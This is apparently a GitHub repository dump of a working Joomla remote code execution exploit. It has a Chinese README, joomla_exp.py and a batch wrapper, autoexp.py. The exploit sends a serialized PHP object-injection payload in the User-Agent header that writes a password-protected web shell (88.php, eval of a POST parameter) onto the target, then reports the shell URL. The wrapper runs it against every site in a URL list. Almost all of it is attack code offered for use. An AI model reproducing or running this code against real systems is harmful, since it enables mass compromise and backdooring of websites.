├── .gitattributes ├── README.md ├── autoexp.py ├── joomla_exp.py ├── run.jpg └── shell.png /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | 7 | # Standard to msysgit 8 | *.doc diff=astextplain 9 | *.DOC diff=astextplain 10 | *.docx diff=astextplain 11 | *.DOCX diff=astextplain 12 | *.dot diff=astextplain 13 | *.DOT diff=astextplain 14 | *.pdf diff=astextplain 15 | *.PDF diff=astextplain 16 | *.rtf diff=astextplain 17 | *.RTF diff=astextplain 18 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ##[关于] 2 | JOOMLA最新代码执行EXP,被人的用着感觉不太对,还是自己动手吧 3 | ## [SHELL] 4 | ![INDEX](/shell.png) 5 | ## [EXPLOIT] 6 | ![INDEX](/run.jpg) 7 | ##[博客地址] 8 | http://az0ne.lofter.com/ 9 | -------------------------------------------------------------------------------- /autoexp.py: -------------------------------------------------------------------------------- 1 | import os 2 | def check(url): 3 | cmd = 'python joomla_exp.py '+url+' >> PCLOK.txt' 4 | p = os.popen(cmd) 5 | print p.read() 6 | if __name__ == '__main__': 7 | 8 | fp=open("url.txt", "r") 9 | alllines=fp.readlines() 10 | fp.close() 11 | for eachline in alllines: 12 | eachline=eachline.strip('\n') 13 | eachline=eachline.strip(' ') 14 | check(eachline) -------------------------------------------------------------------------------- /joomla_exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import sys 4 | def get_url(url, user_agent): 5 | 6 | headers = { 7 | 'User-Agent': user_agent 8 | } 9 | cookies = requests.get(url,headers=headers).cookies 10 | for _ in range(3): 11 | response = requests.get(url, headers=headers,cookies=cookies) 12 | return response.content 13 | 14 | def php_str_noquotes(data): 15 | "Convert string to chr(xx).chr(xx) for use in php" 16 | encoded = "" 17 | for char in data: 18 | encoded += "chr({0}).".format(ord(char)) 19 | 20 | return encoded[:-1] 21 | 22 | 23 | def generate_payload(php_payload): 24 | 25 | php_payload = "eval({0})".format(php_str_noquotes(php_payload)) 26 | 27 | terminate = '\xf0\xfd\xfd\xfd'; 28 | exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";''' 29 | injected_payload = "{};JFactory::getConfig();exit".format(php_payload) 30 | exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload) 31 | exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate 32 | 33 | return exploit_template 34 | 35 | def check(url): 36 | response = requests.get(url) 37 | return response.content 38 | 39 | 40 | turl = sys.argv[1] 41 | syscmd = "file_put_contents(dirname($_SERVER['SCRIPT_FILENAME']).'/88.php',base64_decode('dnZ2PD9waHAgZXZhbCgkX1BPU1Rbenp6XSk7Pz4='));" 42 | pl = generate_payload(syscmd) 43 | get_url(turl, pl) 44 | url = turl+'88.php' 45 | if 'vvv' in check(url): 46 | print u"成功shell为"+turl+u"88.php,密码为zzz" 47 | else: 48 | print u"失败!漏洞已修补或版本不同!" -------------------------------------------------------------------------------- /run.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/az0ne/joomla_exp/5c94d318b9abe6b619dff145342939dcb96d4e70/run.jpg -------------------------------------------------------------------------------- /shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/az0ne/joomla_exp/5c94d318b9abe6b619dff145342939dcb96d4e70/shell.png --------------------------------------------------------------------------------